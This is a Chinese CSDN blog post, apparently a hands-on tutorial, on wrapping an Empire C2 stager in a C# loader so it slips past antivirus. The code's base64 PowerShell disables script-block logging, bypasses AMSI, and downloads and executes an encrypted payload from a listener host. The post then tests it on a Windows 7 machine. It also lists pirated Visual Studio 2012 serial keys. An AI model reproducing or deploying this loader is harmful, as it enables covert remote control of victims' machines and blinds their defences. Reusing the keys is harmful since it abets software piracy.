Empire 免杀过杀软

于 2022-11-13 23:28:59 发布
阅读量203 收藏 1
点赞数
分类专栏: 后渗透emp使用 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yyj1781572/article/details/127837877
版权

1.     cshare 文件过杀毒软件

官网下载地址:

http://download.microsoft.com/download/B/0/F/B0F589ED-F1B7-478C-849A-02C8395D0995/VS2012_ULT_chs.iso

百度网盘下载:

链接:http://pan.baidu.com/share/link?shareid=2791352524&uk=604321482
密码:6q04

Visual Studio 2012旗舰版序列号:

YKCW6-BPFPF-BT8C9-7DCTH-QXGWC          
RBCXF-CVBGR-382MK-DFHJ4-C69G8             

然后info查看信息

设置监听器

usestager windows/csharp_exe       

 在tmp目录复制项目打包文件 解压到本地

用vs2012 打开cmd.sln

/*

 *

 * You may compile this in Visual Studio or SharpDevelop etc.

 *

 *

 *

 *

 */

using System;

using System.Text;

using System.Management.Automation;

using System.Management.Automation.Runspaces;



namespace cmd

{

    class Program

    {

        public static void Main(string[] args)

        {

            var a = "xxxxxxxxxxxxxxxxxxxxxxxxxx";

             string stager = "SQBGACgAJABQAFMAVgBlAHIAcwBJAE8AbgBUAEEAQgBsAEUALgBQAFMAVgBlAHIAUwBJAE8AbgAuAE0AQQBKAE8AcgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBFAEYAXQAuAEEAcwBTAGUATQBCAGwAeQAuAEcAZQBUAFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAdABGAEkARQBgAGwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAGUAdABWAEEATAB1AEUAKAAkAG4AdQBMAGwAKQA7AEkARgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAYQBsAD0AWwBDAG8ATABsAEUAQwB0AGkATwBOAHMALgBHAEUATgBFAHIAaQBDAC4ARABJAEMAVABJAE8AbgBBAFIAWQBbAFMAdAByAGkAbgBHACwAUwBZAHMAdABlAG0ALgBPAEIAagBlAEMAdABdAF0AOgA6AE4AZQBXACgAKQA7ACQAdgBBAGwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAEEAbAB9AEUAbABTAEUAewBbAFMAQwByAGkAUAB0AEIAbABvAGMAawBdAC4AIgBHAEUAdABGAGkAZQBgAEwAZAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAFQAVgBBAEwAVQBFACgAJABuAHUAbABsACwAKABOAGUAVwAtAE8AQgBKAGUAQwB0ACAAQwBPAEwAbABlAGMAdABJAG8ATgBzAC4ARwBFAE4AZQByAGkAQwAuAEgAYQBTAEgAUwBFAFQAWwBTAFQAUgBJAG4ARwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAcwBTAEUATQBiAGwAeQAuAEcARQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBlAFQARgBJAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAVABWAEEATAB1AEUAKAAkAE4AVQBsAGwALAAkAFQAUgBVAEUAKQB9ADsAfQA7AFsAUwB5AHMAVABFAG0ALgBOAGUAVAAuAFMARQByAHYAaQBDAEUAUABPAEkATgB0AE0AQQBuAGEAZwBFAFIAXQA6ADoARQB4AFAARQBjAHQAMQAwADAAQwBvAE4AVABJAE4AVQBFAD0AMAA7ACQAdwBDAD0ATgBFAHcALQBPAGIASgBFAEMAVAAgAFMAeQBTAFQARQBNAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBFAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAFcAYwAuAEgARQBBAEQAZQByAHMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAYwAuAFAAcgBPAHgAWQA9AFsAUwBZAHMAVABFAG0ALgBOAGUAVAAuAFcARQBiAFIAZQBRAHUARQBTAHQAXQA6ADoARABlAEYAQQB1AEwAVABXAGUAYgBQAHIAbwBYAHkAOwAkAHcAYwAuAFAAcgBvAFgAeQAuAEMAcgBFAEQARQBuAHQASQBBAGwAUwAgAD0AIABbAFMAWQBzAHQARQBtAC4ATgBlAHQALgBDAHIARQBkAEUATgBUAGkAQQBMAEMAQQBjAGgAZQBdADoAOgBEAGUARgBBAFUAbAB0AE4ARQB0AFcAbwByAGsAQwByAEUARABlAE4AdABJAGEAbABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwBZAFMAdABlAG0ALgBUAEUAWABUAC4ARQBuAEMAbwBkAEkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcARQBUAEIAWQB0AEUAUwAoACcAOQA3AE0AWwAyAGwAQgBUAEEAQwBjACoARwB7ADgAXwBQAG4AYQBAACUANAB6AC0ASgBXAH0ANgBdAC4AIABpACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIAZwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBPAHUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAeABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADIANQA6ADgAOAA4ADgAJwA7ACQAdAA9ACcALwBhAGQAbQBpAG4ALwBnAGUAdAAuAHAAaABwACcAOwAkAHcAQwAuAEgARQBBAGQARQByAHMALgBBAEQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcwBlAHMAcwBpAG8AbgA9AEUAQQBGAG0AeQBxADUAbwBpAHkAeAA3AFkANwB4AE4ATAA0AFAAUAB4AFEAawB0ACsAKwBZAD0AIgApADsAJABEAGEAVABhAD0AJABXAEMALgBEAG8AdwBuAGwAbwBhAGQARABhAFQAYQAoACQAUwBFAFIAKwAkAFQAKQA7ACQASQB2AD0AJABkAEEAVABhAFsAMAAuAC4AMwBdADsAJABkAEEAVABhAD0AJABEAEEAdABBAFsANAAuAC4AJABEAGEAVABhAC4AbABFAE4ARwBUAGgAXQA7AC0ASgBPAGkAbgBbAEMAaABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAVABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=";

             var decodedScript = Encoding.Unicode.GetString(Convert.FromBase64String(stager));

            var b = "aaaaaaaaaaaaaaaaaaaa";

            Runspace runspace = RunspaceFactory.CreateRunspace();

            runspace.Open();

            RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);

            Pipeline pipeline = runspace.CreatePipeline();



            pipeline.Commands.AddScript(decodedScript);



            pipeline.Commands.Add("Out-String");

            pipeline.Invoke();

        }

    }

}

 点击重新生成,把windows应用程序改成控制台应用程序  

 把cmd.exe文件复制出来 

 然后把它发送到window7上面,开始病毒软件测试

复制到c盘,然后在cmd进行运行,注意此时已把文件名改为xxx.exe

namespace xxx

 此时查看kali有显示

 进来查看主机所有进程

 运行的时候已经把它注入到内存里面了

jack-yyj
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
绕过的各种姿势
CODING...
01-17 3952
1.payload工具---veil-evasion的使用: 在kali上用apt-get install veil-evasion先自动安装好: 成功安装之后可以看到有46个payload可以使用 可以使用list命令列出看可以使用的payload 、 这里我们使用5号payload进行尝试: 设置好一些必要的参数: 然后generate就可以了, 生
empire用法笔记
发哥微课堂
02-28 4484
0x00:简介 empire 是一个针对内网针对域控的一个渗透测试框架,和 msf 类似。其中集成了很多内网的一些工具以及命令,使用方便,且 empire 生成的木马文件基于 powershell,所以在 windows 平台上有很好的效果。结合 msf 使用更是如虎添翼。empire 安装下载命令如下: git clone https://github.com/EmpireProjec...
exe技术探讨
goddemon
07-19 1158
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任最近把大部分的语言的捣鼓分析了下c的python的rust的go的常见的语言市面上有的都研究了下也写了一下自己的发觉python的确实可以说是最简单的了,不过其实深入的话还是得进程注入走ring0层去对抗,不然单纯的静态过了终究有些行为还是会呗动态这篇分享一篇python的吧效果看正文全过的也有不过现在肯定是不会发的。...
Web安全攻防渗透测试
m0_63223219的博客
04-05 6860
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 ...
SharpDevelop(精简版C#)(14.7M)
07-03
感谢支持! 虽然Visual Studio中也有继承CSharp,但是对于那些把C#作为主要开发环境的同志来说,Visual Studio继承的好多组建就不是必须的了,一方面资源较大,安装起来不方便,另外使用起来也不如专门的C#环境轻松。附件中我分享给大家的是我找到的一款专门用于C#语言的轻量级开发环境。总共大小也就14.7M,资源小,下载快,安装方便,使用起来也很轻松。 望工作顺利,感谢!
最新方法所有.exe
10-11
最新方法所有.exe最新方法所有.exe最新方法所有.exe最新方法所有.exe最新方法所有.exe最新方法所有.exe最新方法所有.exe
FDTDEmpire设计UWB天线(费)-综合文档
05-25
an_empire-uwb2News Release UWB ……
empire框架2022最新版本
06-28
Empire实现了无需powshell.exe就可运行Powershell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等,使用能够躲避内网检测喝大部分安全防护工具的查,简单来...
Empire学习笔记.pdf
09-25
Empire是一款强大的、开源的 PowerShell 后渗透测试框架,由 Python 编写,主要用于网络攻防演练、红蓝对抗等安全场景。它允许安全研究人员在Windows、Linux和Mac OS平台上创建自定义的 PowerShell 模块,进行隐蔽的...
empire-web:PowerShell Empire Web界面
05-14
运行Empire REST API服务器获取PowerShell Empire: : ./empire --rest --restport <port> --username <empire> --password <empire> 例如: ./empire --rest --restport 1337 --username admin --password 3mpir3...
Empire知识点梳理
09-25
Empire笔记、思维导图
C#之JSon解析(三)
防止名字重复
07-29 1718
一、所需工具LitJson,因为VS或者sharpdevelop没有专门的库解析json 网盘地址:https://pan.baidu.com/s/1BiCqIk4nMKeGGigG3dXnPQ密码:9h59 添加litJson引用: 下载了该dll文件,添加到工程里,才能使用里面的函数 1、VS添加DLL引用的步骤: 首先将litJSon.dll放到工程的debug文件下,如图: ...
后渗透测试神器Empire的详解
热门推荐
Fly_鹏程万里
06-04 1万+
1. Empire简介官网介绍如下:Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents...
empire-web可视化
我不是大牛
03-19 564
首先说明我的安装系统为kali,教程同样适用于ubantu系统。 1、首先安装Empire,没有安装的可以去先参考其他教程安装。 2、下载empire-web git clone https://github.com/interference-security/empire-web.git 下载完成后查看php版本,并且启动apache服务 3、把下载完成的empire-web移动到/var/...
后渗透神器Empire的简单使用
weixin_30279751的博客
03-16 1809
1、安装 1.1、系统环境: Debian系Linux:例如Ubuntu和Kali(本文使用Kali作为环境) 1.2、安装命令: 安装最后需要输入用户名、密码 wget https://raw.githubusercontent.com/backlion/demo/master/Empire-master.zip unzip Empire-master.zip cd Empire-m...
PowerShell runspace 的创建,使用和查错
weixin_34314962的博客
07-11 936
今天拜读了The Scripting Guy关于runspace的几篇大作,温故而知新,一些忽略的地方更为清楚。https://blogs.technet.microsoft.com/heyscriptingguy/2015/11/26/beginning-use-of-powershell-runspaces-part-1/ runspace这两年在PowerShell使用的频率越来越高,由于他...
test
weixin_30802171的博客
01-23 98
1、设置policy:Set-ExecutionPolicy Unrestricted 2.添加引用 :C:\Program Files (x86)\Reference Assemblies\Microsoft\WindowsPowerShell\v1.0\System.Management.Automation.dll 3.运行代码: Runspace runspace = Runspac...
Empire安装与使用教程:搭建Python2环境与反弹shell
使用Empire时,首先启动Empire,然后通过`listeners`命令查看或管理监听器。例如,创建一个名为"hacker"的HTTP监听器,设置主机地址为`http://192.168.1.14:443`。接着,可以使用`usestager`生成恶意payload,如`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jack-yyj

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值